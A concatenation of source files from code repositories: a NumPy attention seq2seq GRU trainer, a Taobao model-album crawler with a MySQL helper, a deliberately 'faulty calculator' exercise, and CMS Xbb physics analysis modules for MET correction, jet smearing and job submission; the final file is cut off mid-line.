[0, 0, 0] for t in reversed(range(T)): layer = self.layers[t] dx, dh = layer.backward(dhs[:, t, :] + dh) dxs[:, t, :] = dx for i, grad in enumerate(layer.grads): grads[i] += grad for i, grad in enumerate(grads): self.grads[i][...] = grad self.dh = dh return dxs def set_state(self, h): self.h = h def reset_state(self): self.h = None class Softmax: def __init__(self): self.params, self.grads = [], [] self.out = None def forward(self, x): self.out = softmax(x) return self.out def backward(self, dout): dx = self.out * dout sumdx = np.sum(dx, axis=1, keepdims=True) dx -= self.out * sumdx return dx class WeightSum: def __init__(self): self.params, self.grads = [], [] # このレイヤは学習するパラメータを持たないため [] とする self.cache = None def forward(self, hs, a): N, T, H = hs.shape # a は各単語の重要度を表す重み ar = a.reshape(N, T, 1).repeat(H, axis=2)# a の形状を hs と同じ(N, T, H)へ変換 t = hs * ar # 乗算により各単語の重要度を表現したコンテキストベクトルが誕生 c = np.sum(t, axis=1) # 時系列の形状(T)を消す (N, H) self.cache = (hs, ar) return c def backward(self, dc): hs, ar = self.cache N, T, H = hs.shape dt = dc.reshape(N, 1, H).repeat(T, axis=1) # dt の形状に直す(N, T, H) <sum の逆伝播> dhs = dt * ar dar = dt * hs da = np.sum(dar, axis=2) # da の形状に直す(N, T) <repeat の逆伝播> return dhs, da class AttentionWeight: def __init__(self): self.params, self.grads = [], [] self.softmax = Softmax() self.cache = None def forward(self, hs, h): N, T, H = hs.shape hr = h.reshape(N, 1, H).repeat(T, axis=1) # hs と同じ形状の (N, T, H) へ変換 t = hs * hr # 乗算によりhs と h の対応関係を表現(h が hs にどれだけ似ているかを表現) s = np.sum(t, axis=2) a = self.softmax.forward(s) # softmax により確率分布で表現 self.cache = (hs, hr) return a def backward(self, da): hs, hr = self.cache N, T, H = hs.shape ds = self.softmax.backward(da) dt = ds.reshape(N, T, 1).repeat(H, axis=2) # ds の形状に直す (N, T, H) <sum の逆伝播> dhr = dt * hs dhs = dt * hr dh = np.sum(dhr, axis=1) # dh の形状に直す (N, H) <repeat の逆伝播> return dhs, dh class Attention: def __init__(self): self.params, self.grads = [], [] self.attention_weight_layer = AttentionWeight() self.weight_sum_layer = WeightSum() self.attention_weight = None def forward(self, hs, h): a = self.attention_weight_layer.forward(hs, h) out = self.weight_sum_layer.forward(hs, a) self.attention_weight = a # 各単語への重みを保持 return out def backward(self, dout): dhs0, da = self.weight_sum_layer.backward(dout) dhs1, dh = self.attention_weight_layer.backward(da) dhs = dhs0 + dhs1 return dhs, dh class TimeAttention: def __init__(self): self.params, self.grads = [], [] self.layers = None self.attention_weights = None def forward(self, hs_enc, hs_dec): N, T, H = hs_dec.shape out = np.empty_like(hs_dec) self.layers = [] self.attention_weights = [] for t in range(T): # 時系列分繰り返す layer = Attention() out[:, t, :] = layer.forward(hs_enc, hs_dec[:, t, :]) # 各時系列に該当するデータを入れていく self.layers.append(layer) self.attention_weights.append(layer.attention_weight) # Attention で保持した各単語への重みをリスト追加していく → 各時系列ごとの単語への重みを保有する return out def backward(self, dout): N, T, H = dout.shape dhs_enc = 0 dhs_dec = np.empty_like(dout) for t in range(T): layer = self.layers[t] # t番目(各時系列の順番)のレイヤを呼び出す dhs, dh = layer.backward(dout[:, t, :]) # 各時系列に該当する dout をいれる dhs_enc += dhs # 各時系列ごとの dhs をまとめる(encoder の hs の勾配として) dhs_dec[:, t, :] = dh # 各時系列ごとの dh をまとめる(decoder の h の勾配として) return dhs_enc, dhs_dec # Seq2Seq class AttentionEncoderGRU: ''' vocab_size 語彙数(文字の種類) wordvec_size 文字ベクトルの次元数 hidden_size 隠れ状態ベクトルの次元数 ''' def __init__(self, vocab_size, wordvec_size, hidden_size): V, D ,H = vocab_size, wordvec_size, hidden_size rn = np.random.randn embed_W = (rn(V, D) / 100).astype('f') gru_Wx = (rn(D, 3 * H) / np.sqrt(D)).astype('f') gru_Wh = (rn(H, 3 * H) / np.sqrt(H)).astype('f') gru_b = np.zeros(3 * H).astype('f') self.embed = TimeEmbedding(embed_W) self.gru = TimeGRU(gru_Wx, gru_Wh, gru_b, stateful=False) # stateful=False の理由:今回は短い時系列データが複数存在し、隠れ状態ベクトルを維持しないため self.params = self.embed.params + self.gru.params self.grads = self.embed.grads + self.gru.grads self.hs = None def forward(self, xs): xs = self.embed.forward(xs) hs = self.gru.forward(xs) return hs # hs の時系列データとして全て Decoder に渡す def backward(self, dhs): dout = self.gru.backward(dhs) # dh は Decoder より渡された勾配 dout = self.embed.backward(dout) return dout class AttentionDecoderGRU: def __init__(self, vocab_size, wordvec_size, hidden_size): V, D, H = vocab_size, wordvec_size, hidden_size rn = np.random.randn embed_W = (rn(V, D) / 100).astype('f') gru_Wx = (rn(D, 3 * H) / np.sqrt(D)).astype('f') gru_Wh = (rn(H, 3 * H) / np.sqrt(H)).astype('f') gru_b = np.zeros(3 * H).astype('f') affine_W = (rn(2 * H, V) / np.sqrt(2 * H)).astype('f') affine_b = np.zeros(V).astype('f') self.embed = TimeEmbedding(embed_W) self.gru = TimeGRU(gru_Wx, gru_Wh, gru_b, stateful=True) self.attention = TimeAttention() self.affine = TimeAffine(affine_W, affine_b) layers = [self.embed, self.gru, self.attention, self.affine] self.params, self.grads = [], [] for layer in layers: self.params += layer.params self.grads += layer.grads def forward(self, xs, enc_hs): h = enc_hs[:, -1] # 一番最後の enc_hs を取り出す self.gru.set_state(h) out = self.embed.forward(xs) dec_hs = self.gru.forward(out) c = self.attention.forward(enc_hs, dec_hs) out = np.concatenate((c, dec_hs), axis=2) # self.gru で算出した dec_hs と c を連結 score = self.affine.forward(out) return score def backward(self, dscore): dout = self.affine.backward(dscore) N, T, H2 = dout.shape H = H2 // 2 # ①self.gru からもらった hs, attention で算出した c に分ける dc, ddec_hs0 = dout[:, :, :H], dout[:, :, H:] # ②attention に入っていった encoder の hs と decoder(self.gruで算出された) の hs に分ける denc_hs, ddec_hs1 = self.attention.backward(dc) # ①②で出した self.gru から出てきた ds0,1 を合流させる ddec_hs = ddec_hs0 + ddec_hs1 dout = self.gru.backward(ddec_hs) dh = self.gru.dh denc_hs[:, -1] += dh # self.gru.dh は encoder の最後の hs であり, これも encoder へ渡す self.embed.backward(dout) return denc_hs def generate(self, enc_hs, start_id, sample_size): sampled = [] sample_id = start_id h = enc_hs[:, -1] self.gru.set_state(h) # enc_hs の最後の h をセットする for _ in range(sample_size): x = np.array([sample_id]).reshape((1, 1)) # 生成物(sample_id)を入力データとして使うためのコード out = self.embed.forward(x) dec_hs = self.gru.forward(out) c = self.attention.forward(enc_hs, dec_hs) out = np.concatenate((c, dec_hs), axis=2) score = self.affine.forward(out) sample_id = np.argmax(score.flatten()) # argmax 今回は確率的でなく決定して出力するため sampled.append(sample_id) return sampled # 生成した単語のidリスト # Attention Seq2Seq class AttentionSeq2seqGRU: def __init__(self, vocab_size, wordvec_size, hidden_size): args = vocab_size, wordvec_size, hidden_size self.encoder = AttentionEncoderGRU(*args) self.decoder = AttentionDecoderGRU(*args) self.softmax = TimeSoftmaxWithLoss() self.params = self.encoder.params + self.decoder.params self.grads = self.encoder.grads + self.decoder.grads def forward(self, xs, ts): decoder_xs, decoder_ts = ts[:, :-1], ts[:, 1:] h = self.encoder.forward(xs) score = self.decoder.forward(decoder_xs, h) loss = self.softmax.forward(score, decoder_ts) return loss def backward(self, dout=1): dout = self.softmax.backward(dout) dh = self.decoder.backward(dout) dout = self.encoder.backward(dh) # Encoder に dh を渡す return dout def generate(self, xs, start_id, sample_size): h = self.encoder.forward(xs) sample = self.decoder.generate(h, start_id, sample_size) return sample def save_params(self, file_name=None): if file_name is None: file_name = self.__class__.__name__ + '.pkl' params = [p.astype(np.float16) for p in self.params] with open(file_name, 'wb') as f: pickle.dump(params, f) def load_params(self, file_name=None): if file_name is None: file_name = self.__class__.__name__ + '.pkl' if '/' in file_name: file_name = file_name.replace('/', os.sep) if not os.path.exists(file_name): raise IOError('No file: ' + file_name) with open(file_name, 'rb') as f: params = pickle.load(f) params = [p.astype('f') for p in params] for i, param in enumerate(self.params): param[...] = params[i] # Trainer fit # データの取り出し (x_train, t_train), (x_test, t_test) = load_data('date.txt') char_to_id, id_to_char = get_vocab() # データを反転させる(学習精度の向上) x_train, x_test = x_train[:, ::-1], x_test[:, ::-1] vocab_size = len(char_to_id) wordvec_size = 16 hidden_size = 256 batch_size = 64 max_epoch = 4 max_grad = 5.0 model = AttentionSeq2seqGRU(vocab_size, wordvec_size, hidden_size) optimizer = Adam() trainer = Trainer(model, optimizer) acc_list = [] for epoch in range(max_epoch): trainer.fit(x_train, t_train, max_epoch=1, batch_size=batch_size, max_grad=max_grad) correct_num = 0 for i in range(len(x_test)): question, correct = x_test[[i]], t_test[[i]] verbose = i < 10 correct_num += eval_seq2seq(model, question, correct, id_to_char, verbose, is_reverse=True) acc = float(correct_num) / len(x_test) acc_list.append(acc) print('val acc %.3f%%' % (acc * 100)) model.save_params() # グラフの描画(学習内容の評価) x = np.arange(len(acc_list)) plt.plot(x, acc_list, marker='o') plt.xlabel('epochs') plt.ylabel('accuracy') plt.ylim(-0.05, 1.05) plt.show()
Python
862
29.783062
143
/train_seq2seq_gru_attention.py
0.529188
0.519465
cheenwe/mm
refs/heads/master
# encoding=utf-8 import re import os import utils import urllib2 from sqlhelper import SqlHelper from bs4 import BeautifulSoup as bs class Crawler(object): def __init__(self): super(Crawler, self).__init__() self.album_prefix = 'https://mm.taobao.com/self/album/open_album_list.htm?_charset=utf-8&user_id%20={0}&page={1}' self.image_prefix = 'https://mm.taobao.com/album/json/get_album_photo_list.htm?user_id={0}&album_id={1}&page={2}' self.image_pattern = re.compile('''img.*290x10000.jpg''', re.U) self.image_name_pattern = re.compile('''"picId":"(.*?)"''', re.U) self.model_pattern = re.compile('''<a class="lady-name" href="(.*?)".*>(.*?)</a>''', re.U) self.album_pattern = re.compile('''.*album_id=(.*?)&.*''', re.U) self.links = [] self.ids= [] self.names= [] self.sql = SqlHelper() def readHtml(self, html): response = urllib2.urlopen(html) return response.read() def getLinkIdAndNames(self, htmlData): items = re.findall(self.model_pattern, htmlData) self.links = [link for link, name in items] self.names = [name.decode('gbk') for link, name in items] self.ids = [link[link.index('=')+1:] for link in self.links] def getAlbums(self): for i, model_id in enumerate(self.ids): utils.log('start downloading:%s' % self.names[i]) # print 'start downloading', self.names[i] # 插入用户 command = self.sql.insert_data_to_users() msg = (model_id, self.names[i], "",) try: self.sql.insert_data(command, msg, commit = True) except Exception, e: utils.log('insert users data errors') for page in xrange(1, 10): utils.log('current page:%s' % page) # print 'current page', page model_url = self.album_prefix.format(model_id, page) soup = bs(self.readHtml(model_url), 'html.parser') albums = soup.find_all('div', class_ = 'mm-photo-cell-middle') if not albums: break for album in albums: album_name = album.find('h4').a.string.strip().rstrip('.') album_link= album.find('h4').a['href'] album_id = re.findall(self.album_pattern, album_link)[0] album_create_time = album.find('p', class_ = 'mm-photo-date').string.strip(u'创建时间: ').strip(u'´´½¨Ê±¼ä:') album_img_count = album.find('span', class_ = 'mm-pic-number').string.strip('()').strip(u'张').strip(u'ÕÅ') # print ">>>>>>>>>>>>>>>>>>>>>>" # print album.find('p', class_ = 'mm-photo-date').string # print album_create_time # print ">>>>>>>>>>>>>>>>>>>>>>" # 插入相册 command = self.sql.insert_data_to_albums() msg = (album_id, model_id, album_name, album_create_time, "", 1, album_img_count) try: self.sql.insert_data(command, msg, commit = True) except Exception, e: utils.log('insert albums data errors') utils.log('start in album:%s, total size: %s' % (album_name, album_img_count)) self.getImages(model_id, album_id, album_img_count) def getImages(self, model_id, album_id, image_count): # print 'start downloading album', album_id, image_count, '张' for page in xrange(1, (int(image_count)-1)/16+2): link = self.image_prefix.format(model_id, album_id, page) body = self.readHtml(link).decode('gbk') images = re.findall(self.image_pattern, body) # tried to use des as names, however, it duplicates times. So i chose pic ids. names = re.findall(self.image_name_pattern, body) for idx, image in enumerate(images): image = image.replace('290', '620') try: img_url = ('http://'+image).replace('jpg_620x10000.jpg','jpg') except Exception as e: img_url = ('http://'+image) # id , album_id , name , url , kind # 插入图片 command = self.sql.insert_data_to_photos() msg = (None, album_id, "", img_url, 1) try: self.sql.insert_data(command, msg, commit = True) except Exception, e: utils.log('insert photos data errors') # print 'created photos success' if __name__ == '__main__': test_html = 'https://mm.taobao.com/json/request_top_list.htm?page={0}' for page in xrange(1, 100): c = Crawler() data = c.readHtml(test_html.format(page)) c.getLinkIdAndNames(data) c.getAlbums()
Python
121
40.206612
126
/mm.py
0.519655
0.508624
cheenwe/mm
refs/heads/master
# coding=utf-8 import utils import logging import config import pymysql class SqlHelper(object): def __init__(self): self.conn = pymysql.connect(**config.database_config) self.cursor = self.conn.cursor() try: self.conn.select_db(config.database) except: self.create_database() self.conn.select_db(config.database) def create_database(self): try: command = 'CREATE DATABASE IF NOT EXISTS %s DEFAULT CHARACTER SET \'utf8\' ' % config.database utils.log('create_database command:%s' % command) self.cursor.execute(command) self.conn.commit() except Exception, e: utils.log('SqlHelper create_database exception:%s' % str(e), logging.WARNING) def create_table(self, command): try: utils.log('create_table command:%s' % command) x = self.cursor.execute(command) self.conn.commit() return x except Exception, e: utils.log('create_table exception:%s' % str(e), logging.WARNING) def insert_data(self, command, data, commit = False): try: # utils.log('insert_data command:%s, data:%s' % (command, data)) x = self.cursor.execute(command, data) if commit: self.conn.commit() return x except Exception, e: utils.log('insert_data exception msg:%s' % str(e), logging.WARNING) def commit(self): self.conn.commit() def execute(self, command, commit = True): try: utils.log('execute command:%s' % command) data = self.cursor.execute(command) if commit: self.conn.commit() return data except Exception, e: utils.log('execute exception msg:%s' % str(e)) return None def query(self, command, commit = False): try: utils.log('execute command:%s' % command) self.cursor.execute(command) data = self.cursor.fetchall() if commit: self.conn.commit() return data except Exception, e: utils.log('execute exception msg:%s' % str(e)) return None def query_one(self, command, commit = False): try: utils.log('execute command:%s' % command) self.cursor.execute(command) data = self.cursor.fetchone() if commit: self.conn.commit() return data except Exception, e: utils.log('execute exception msg:%s' % str(e)) return None def insert_data_to_users(self): command = ("INSERT INTO users " "(id, name, remark)" "VALUES(%s, %s, %s)") return command def insert_data_to_albums(self): command = ("INSERT INTO albums " "(id, user_id, name, created_at, remark, kind, total)" "VALUES(%s, %s, %s, %s, %s, %s, %s)") return command def insert_data_to_photos(self): command = ("INSERT INTO photos " "(id, album_id, name, url, kind)" "VALUES(%s, %s, %s, %s, %s)") return command #创建表 sql = SqlHelper() sql.create_table("create table IF NOT EXISTS users(id bigint, name varchar(255), remark text )") sql.create_table("create table IF NOT EXISTS albums(id bigint, user_id bigint, name varchar(255), created_at date, remark text, kind int, total float) ") sql.create_table("create table IF NOT EXISTS photos(id bigint, album_id bigint, name varchar(255), url varchar(255), kind int) ")
Python
111
32.441441
154
/sqlhelper.py
0.554418
0.550647
cheenwe/mm
refs/heads/master
# encoding=utf-8 import logging import os import config import traceback import datetime # 自定义的日志输出 def log(msg, level = logging.DEBUG): if not os.path.exists('log'): os.makedirs('log') logging.basicConfig( filename = 'log/run.log', format = '%(asctime)s: %(message)s', level = logging.DEBUG ) logging.log(level, msg) print('%s [%s], msg:%s' % (datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), level, msg)) if level == logging.WARNING or level == logging.ERROR: for line in traceback.format_stack(): print(line.strip()) for line in traceback.format_stack(): logging.log(level, line.strip()) def make_dir(dir): log('make dir:%s' % dir) if not os.path.exists(dir): os.makedirs(dir)
Python
36
21.444445
98
/utils.py
0.595297
0.594059
cheenwe/mm
refs/heads/master
# encoding=utf-8 from sqlhelper import SqlHelper sql = SqlHelper() def insert_data_to_users(): command = ("INSERT IGNORE INTO users " "(id, name, created_at, remark)" "VALUES(%s, %s, %s, %s)") return command command = insert_data_to_users() msg = (None, "112", "", "",) sql.insert_data(command, msg, commit = True) print 'created user success'
Python
19
18.210526
44
/mm_test.py
0.641096
0.630137
ravisharma607/Faulty-Calculator
refs/heads/master
""" Q->) design a calculator which will correctly solve all the problem except the following one 45*3 = 123, 85+2 = 546, 33-23 = 582 | your program should take operator and two numbers as input from the user and then return the result """ try: num1 = int(input("enter first number:")) num2 = int(input("enter second number:")) op = input("choose operatot => | +, -, *, /| :") if (num1 == 45 and num2 == 3 or num1 == 85 and num2 == 2 or num1 == 33 and num2 == 23): if op == "+": print(546) elif op == "-": print(582) elif op == "*": print(123) else: if op == "+": print(num1 + num2) elif op == "-": print(num1 - num2) elif op == "*": print(num1 * num2) elif op == "/": print(num1 / num2) except Exception as e: print("Please Enter a Valid Integer Value")
Python
24
37.291668
142
/faultyCalcy.py
0.518519
0.459695
dabercro/Xbb
refs/heads/master
#!/usr/bin/env python from __future__ import print_function import ROOT from BranchTools import Collection from BranchTools import AddCollectionsModule import array import os import math import numpy as np # MET X/Y correction class METXY(AddCollectionsModule): def __init__(self, year): super(METXY, self).__init__() self.debug = 'XBBDEBUG' in os.environ self.year = int(year) self.quickloadWarningShown = False self.systematics = ['jer','jesAbsoluteStat','jesAbsoluteScale','jesAbsoluteFlavMap','jesAbsoluteMPFBias','jesFragmentation','jesSinglePionECAL','jesSinglePionHCAL','jesFlavorQCD','jesRelativeJEREC1','jesRelativeJEREC2','jesRelativeJERHF','jesRelativePtBB','jesRelativePtEC1','jesRelativePtEC2','jesRelativePtHF','jesRelativeBal','jesRelativeFSR','jesRelativeStatFSR','jesRelativeStatEC','jesRelativeStatHF','jesPileUpDataMC','jesPileUpPtRef','jesPileUpPtBB','jesPileUpPtEC1','jesPileUpPtEC2','jesPileUpPtHF','jesPileUpMuZero','jesPileUpEnvelope','jesTotal','unclustEn'] def customInit(self, initVars): self.sampleTree = initVars['sampleTree'] self.sample = initVars['sample'] self.config = initVars['config'] # load METXYCorr_Met_MetPhi from VHbb namespace VHbbNameSpace = self.config.get('VHbbNameSpace', 'library') ROOT.gSystem.Load(VHbbNameSpace) self.MET_Pt = array.array('f', [0.0]) self.MET_Phi = array.array('f', [0.0]) self.sampleTree.tree.SetBranchAddress("MET_Pt", self.MET_Pt) self.sampleTree.tree.SetBranchAddress("MET_Phi", self.MET_Phi) self.addBranch("MET_Pt_uncorrected") self.addBranch("MET_Phi_uncorrected") if self.sample.isMC(): self.MET_Pt_syst = {} self.MET_Phi_syst = {} for syst in self.systematics: self.MET_Pt_syst[syst] = {} self.MET_Phi_syst[syst] = {} for Q in self._variations(syst): self.MET_Pt_syst[syst][Q] = array.array('f', [0.0]) self.MET_Phi_syst[syst][Q] = array.array('f', [0.0]) self.sampleTree.tree.SetBranchAddress("MET_pt_"+syst+Q, self.MET_Pt_syst[syst][Q]) self.sampleTree.tree.SetBranchAddress("MET_phi_"+syst+Q, self.MET_Phi_syst[syst][Q]) self.addBranch("MET_pt_uncorrected_"+syst+Q) self.addBranch("MET_phi_uncorrected_"+syst+Q) def processEvent(self, tree): if not self.hasBeenProcessed(tree): self.markProcessed(tree) # backup uncorrected branches self._b('MET_Pt_uncorrected')[0] = tree.MET_Pt self._b('MET_Phi_uncorrected')[0] = tree.MET_Phi MET_Pt_corrected, MET_Phi_corrected = ROOT.VHbb.METXYCorr_Met_MetPhi(tree.MET_Pt, tree.MET_Phi, tree.run, self.year, self.sample.isMC(), tree.PV_npvs) # overwrite MET_Pt, MET_Phi branches self.MET_Pt[0] = MET_Pt_corrected self.MET_Phi[0] = MET_Phi_corrected if self.sample.isMC(): for syst in self.systematics: for Q in self._variations(syst): # backup uncorrected branches self._b("MET_pt_uncorrected_"+syst+Q)[0] = self.MET_Pt_syst[syst][Q][0] self._b("MET_phi_uncorrected_"+syst+Q)[0] = self.MET_Phi_syst[syst][Q][0] MET_Pt_corrected, MET_Phi_corrected = ROOT.VHbb.METXYCorr_Met_MetPhi(self.MET_Pt_syst[syst][Q][0], self.MET_Phi_syst[syst][Q][0], tree.run, self.year, self.sample.isMC(), tree.PV_npvs) # overwrite MET_Pt, MET_Phi branches self.MET_Pt_syst[syst][Q][0] = MET_Pt_corrected self.MET_Phi_syst[syst][Q][0] = MET_Phi_corrected # formulas by default reload the branch content when evaluating the first instance of the object! # SetQuickLoad(1) turns off this behavior for formulaName, treeFormula in self.sampleTree.formulas.items(): if 'MET' in formulaName: if not self.quickloadWarningShown: self.quickloadWarningShown = True print("INFO: SetQuickLoad(1) called for formula:", formulaName) print("INFO: -> EvalInstance(0) on formulas will not re-load branches but will take values from memory, which might have been modified by this module.") treeFormula.SetQuickLoad(1)
Python
91
49.813187
577
/python/myutils/METXY.py
0.60441
0.597925
dabercro/Xbb
refs/heads/master
#!/usr/bin/env python from __future__ import print_function import ROOT from BranchTools import Collection from BranchTools import AddCollectionsModule import array import os import math import numpy as np # applies the smearing to MC jet resolution and modifies the Jet_PtReg* branches of the tree class JetSmearer(AddCollectionsModule): def __init__(self, year, unsmearPreviousCorrection=True, backupPreviousCorrection=True): super(JetSmearer, self).__init__() self.debug = 'XBBDEBUG' in os.environ self.unsmearPreviousCorrection = unsmearPreviousCorrection self.backupPreviousCorrection = backupPreviousCorrection self.quickloadWarningShown = False self.year = year if type(year) == str else str(year) self.smear_params = { #'2016': [1.0, 0.0, 0.0, 0.0], '2017': [1.0029846959, 0.0212893588055, 0.030684, 0.052497], '2018': [0.98667384694, 0.0197153848807, 0.038481, 0.053924], } if self.year not in self.smear_params: print("ERROR: smearing for year", self.year, " not available!") raise Exception("SmearingError") self.scale, self.scale_err, self.smear, self.smear_err = self.smear_params[self.year] def customInit(self, initVars): self.sampleTree = initVars['sampleTree'] self.isData = initVars['sample'].isData() self.sample = initVars['sample'] if self.sample.isMC(): # resolutions used in post-processor smearing self.unsmearResNom = 1.1 self.unsmearResUp = 1.2 self.unsmearResDown = 1.0 self.maxNjet = 256 self.PtReg = array.array('f', [0.0]*self.maxNjet) self.PtRegUp = array.array('f', [0.0]*self.maxNjet) self.PtRegDown = array.array('f', [0.0]*self.maxNjet) self.sampleTree.tree.SetBranchAddress("Jet_PtReg", self.PtReg) self.sampleTree.tree.SetBranchAddress("Jet_PtRegUp", self.PtRegUp) self.sampleTree.tree.SetBranchAddress("Jet_PtRegDown", self.PtRegDown) if self.backupPreviousCorrection: self.addVectorBranch("Jet_PtRegOld", default=0.0, branchType='f', length=self.maxNjet, leaflist="Jet_PtRegOld[nJet]/F") self.addVectorBranch("Jet_PtRegOldUp", default=0.0, branchType='f', length=self.maxNjet, leaflist="Jet_PtRegOldUp[nJet]/F") self.addVectorBranch("Jet_PtRegOldDown", default=0.0, branchType='f', length=self.maxNjet, leaflist="Jet_PtRegOldDown[nJet]/F") def processEvent(self, tree): if not self.hasBeenProcessed(tree) and self.sample.isMC(): self.markProcessed(tree) nJet = tree.nJet # backup the Jet_PtReg branches with the old smearing if self.backupPreviousCorrection: for i in range(nJet): self._b("Jet_PtRegOld")[i] = self.PtReg[i] self._b("Jet_PtRegOldUp")[i] = self.PtRegUp[i] self._b("Jet_PtRegOldDown")[i] = self.PtRegDown[i] # original post-procesor smearing which is undone: # if isMC: # # until we have final post-regression smearing factors we assume a flat 10% # if sysVar==0: # nominal # resSmear = 1.1 # elif sysVar==1: # up # resSmear = 1.2 # elif sysVar==-1: # down # resSmear = 1.0 # smearedPt = jet.pt*jet.bRegCorr # if jet.genJetIdx >=0 and jet.genJetIdx < len(self.genJetsWithNeutrinos) : # genJet=self.genJetsWithNeutrinos[jet.genJetIdx] # dPt = smearedPt - genJet.Pt() # smearedPt=genJet.Pt()+resSmear*dPt # return smearedPt # undo old smearing if self.unsmearPreviousCorrection: for i in range(nJet): genJetIdx = tree.Jet_genJetIdx[i] if genJetIdx > -1 and genJetIdx < len(tree.GenJetWithNeutrinos_pt): genJetPt = tree.GenJetWithNeutrinos_pt[genJetIdx] self.PtReg[i] = genJetPt + (self.PtReg[i] - genJetPt)/self.unsmearResNom self.PtRegUp[i] = genJetPt + (self.PtRegUp[i] - genJetPt)/self.unsmearResUp self.PtRegDown[i] = genJetPt + (self.PtRegDown[i] - genJetPt)/self.unsmearResDown # after undoing the smearing, check if up/down variations are the same assert (max(abs(self.PtReg[i]-self.PtRegUp[i]),abs(self.PtRegUp[i]-self.PtRegDown[i])) < 0.001 or self.PtReg[i] < 0) # apply new smearing for i in range(nJet): genJetIdx = tree.Jet_genJetIdx[i] if genJetIdx > -1 and genJetIdx < len(tree.GenJetWithNeutrinos_pt): gen_pt = tree.GenJetWithNeutrinos_pt[genJetIdx] # reference: https://github.com/dabercro/hbb/blob/b86589128a6839a12efaf041f579fe88c1d1be38/nanoslimmer/applysmearing/applysmearing.py regressed = self.PtReg[i] no_smear = regressed * self.scale gen_diff = regressed - gen_pt nominal = max(0.0, (gen_pt + gen_diff * (1.0 + self.smear)) * self.scale) band = math.sqrt(pow(nominal/self.scale * self.scale_err, 2) + pow(gen_diff * self.scale * self.smear_err, 2)) down, up = (max(nominal - band, no_smear), nominal + band) if regressed > gen_pt else (min(nominal + band, no_smear), nominal - band) self.PtReg[i] = nominal self.PtRegUp[i] = up self.PtRegDown[i] = down # formulas by default reload the branch content when evaluating the first instance of the object! # SetQuickLoad(1) turns off this behavior for formulaName, treeFormula in self.sampleTree.formulas.items(): if 'Jet_PtReg' in formulaName: if not self.quickloadWarningShown: self.quickloadWarningShown = True print("INFO: SetQuickLoad(1) called for formula:", formulaName) print("INFO: -> EvalInstance(0) on formulas will not re-load branches but will take values from memory, which might have been modified by this module.") treeFormula.SetQuickLoad(1) # print("\x1b[31mERROR: this module can't be used together with others which use formulas based on branches changed inside this module!\x1b[0m") # raise Exception("NotImplemented")
Python
130
51.453846
177
/python/myutils/JetSmearer.py
0.584225
0.557836
dabercro/Xbb
refs/heads/master
#! /usr/bin/env python import os import sys import glob from optparse import OptionParser from myutils.BetterConfigParser import BetterConfigParser from myutils.FileList import FileList from myutils.FileLocator import FileLocator from myutils.copytreePSI import filelist from myutils.sample_parser import ParseInfo def get_config(opts): # From submit.py pathconfig = BetterConfigParser() pathconfig.read('%sconfig/paths.ini' % opts.tag) try: _configs = [x for x in pathconfig.get('Configuration', 'List').split(" ") if len(x.strip()) > 0] if 'volatile.ini' in _configs: _configs.remove('volatile.ini') configs = ['%sconfig/' % (opts.tag) + c for c in _configs] except Exception as e: print("\x1b[31mERROR:" + str(e) + "\x1b[0m") print("\x1b[31mERROR: configuration file not found. Check config-tag specified with -T and presence of '[Configuration] List' in .ini files.\x1b[0m") raise Exception("ConfigNotFound") # read config config = BetterConfigParser() config.read(configs) return config def add_to_config(condor_config, template, sample, config, locator): if os.environ.get('XBBDEBUG'): print('Adding %s:' % sample) sampledir = os.path.join(config.get('Directories', 'CONDORout'), sample) if not os.path.exists(sampledir): os.makedirs(sampledir) for part, infile in enumerate(filelist(config.get('Directories', 'samplefiles'), sample)): job = { 'log': '%s_part%s' % (sample, part), 'part': part, 'sample': sample, 'filelist': FileList.compress(infile), 'outfile': locator.getFilenameAfterPrep(infile) } output_file = os.path.join(sampledir, job['outfile']) if os.path.exists(output_file) and os.stat(output_file).st_size: continue condor_config.write(template.format(**job)) if __name__ == '__main__': parser = OptionParser() parser.add_option('-T', '--tag', dest='tag', default='default', help='Tag to run the analysis with, example \'8TeV\' uses 8TeVconfig to run the analysis') parser.add_option('-S','--samples',dest='samples',default='*', help='samples you want to run on') parser.add_option('-o', '--output', dest='output', default='condor', help='output prefix') parser.add_option('-c', '--config', dest='config', default=None, help='Display a config value instead of making a submit file') (opts, args) = parser.parse_args(sys.argv) config = get_config(opts) if opts.config: print(config.get(*opts.config.split(':'))) exit(0) filelocator = FileLocator(config) parseinfo = ParseInfo(samples_path=config.get('Directories', 'PREPin'), config=config) with open('batch/condor/mit_header.sub', 'r') as header_file: header = header_file.read() logdir = os.path.join('/home/dabercro/public_html/xbb', config.get('Directories', 'Dname')) if not os.path.exists(logdir): os.makedirs(logdir) with open('batch/condor/mit_template.sub', 'r') as template_file: template = template_file.read().format( logdir=logdir, tag=opts.tag, outdir=config.get('Directories', 'CONDORin'), condorout=config.get('Directories', 'CONDORout'), log='{log}', part='{part}', sample='{sample}', filelist='{filelist}', outfile='{outfile}' ) with open('%s_%s.cfg' % (opts.output, opts.tag), 'w') as condor_config: condor_config.write(header) for sample_file in glob.iglob('%s/%s.txt' % (config.get('Directories', 'samplefiles'), opts.samples)): if sample_file.endswith('.root.txt'): continue sample = os.path.basename(sample_file).split('.')[0] samples = parseinfo.find(sample) if os.environ.get('XBBDEBUG'): print(samples) if len(samples) == 1: add_to_config(condor_config, template, sample, config, filelocator)
Python
124
32.080647
157
/python/submitMIT.py
0.618723
0.614822
dabercro/Xbb
refs/heads/master
#!/usr/bin/env python import ROOT import numpy as np import array import os from BranchTools import Collection from BranchTools import AddCollectionsModule from XbbTools import XbbTools class isBoosted(AddCollectionsModule): def __init__(self, branchName='isBoosted', cutName='all_BOOST'): super(isBoosted, self).__init__() self.branchName = branchName self.cutName = cutName self.version = 3 self.variations = self._variations("isBoosted") # returns cut string with variables replaced by their systematic variations def getSystVarCut(self, cut, syst, UD): replacementRulesList = XbbTools.getReplacementRulesList(self.config, syst) systVarCut = XbbTools.getSystematicsVariationTemplate(cut, replacementRulesList) systVarCut = systVarCut.replace('{syst}', syst).replace('{UD}', UD) return systVarCut def customInit(self, initVars): self.sample = initVars['sample'] self.sampleTree = initVars['sampleTree'] self.config = initVars['config'] self.boostedCut = self.config.get('Cuts', self.cutName) self.systVarCuts = {} self.systematics = sorted(list(set(sum([eval(self.config.get('LimitGeneral', x)) for x in ['sys_cr', 'sys_BDT', 'sys_Mjj']], [])))) # Nominal self.addIntegerBranch(self.branchName) self.sampleTree.addFormula(self.boostedCut) # systematic variations if self.sample.isMC(): for syst in self.systematics: for UD in self.variations: systVarBranchName = self._v(self.branchName, syst, UD) self.addIntegerBranch(systVarBranchName) self.systVarCuts[systVarBranchName] = self.getSystVarCut(self.boostedCut, 